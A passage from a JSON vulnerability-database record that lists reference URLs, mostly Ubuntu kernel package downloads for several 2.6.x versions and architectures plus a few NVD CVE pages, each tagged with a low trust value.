        "url": "http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext2-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.31-19-powerpc-smp_2.6.31-19.56_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ppp-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ipv6-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.28-18-server_2.6.28-18.59_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/plip-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-0006"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/affs-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/universe/l/linux/linux-image-2.6.24-27-xen_2.6.24-27.65_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-generic_2.6.24-27.65_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/virtio-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/pcmcia-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/firewire-core-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/pcmcia-storage-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ipv6-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-4021"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/input-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/mouse-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-pcmcia-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-amd64-server_2.6.15-55.82_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/universe/l/linux/linux-image-2.6.24-27-openvz_2.6.24-27.65_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/acpi-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/loop-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-fsl-imx51/linux-fsl-imx51_2.6.31-108.21.dsc"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/socket-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/xfs-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/ipv6-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/socket-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-storage-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.31-19-sparc64_2.6.31-19.56_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/sata-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/md-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.31-19-powerpc64-smp_2.6.31-19.56_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-0003"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/serial-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/pcmcia-storage-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/universe/l/linux/linux-image-2.6.24-27-openvz_2.6.24-27.65_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-source-2.6.15_2.6.15-55.82.diff.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/ide-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.31-19-generic_2.6.31-19.56_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-core-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-storage-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nfs-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext2-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/socket-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/crc-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-pcmcia-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/reiserfs-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/ipv6-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/irda-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-usb-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/mouse-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-4538"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-usb-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-sparc64-smp_2.6.15-55.82_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-686_2.6.15-55.82_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-source-2.6.15_2.6.15-55.82_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-amd64-generic_2.6.15-55.82_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.31-19.56.dsc"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-kernel-devel_2.6.24-27.65_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/serial-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fat-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ppp-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/loop-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/acpi-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.31-19-powerpc_2.6.31-19.56_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-386_2.6.24-27.65_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-pcmcia-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.24-27-generic_2.6.24-27.65_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-storage-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.28-18_2.6.28-18.59_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/irda-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/pcmcia-storage-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/floppy-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb"
      },
      {
        "trust": 0.1,
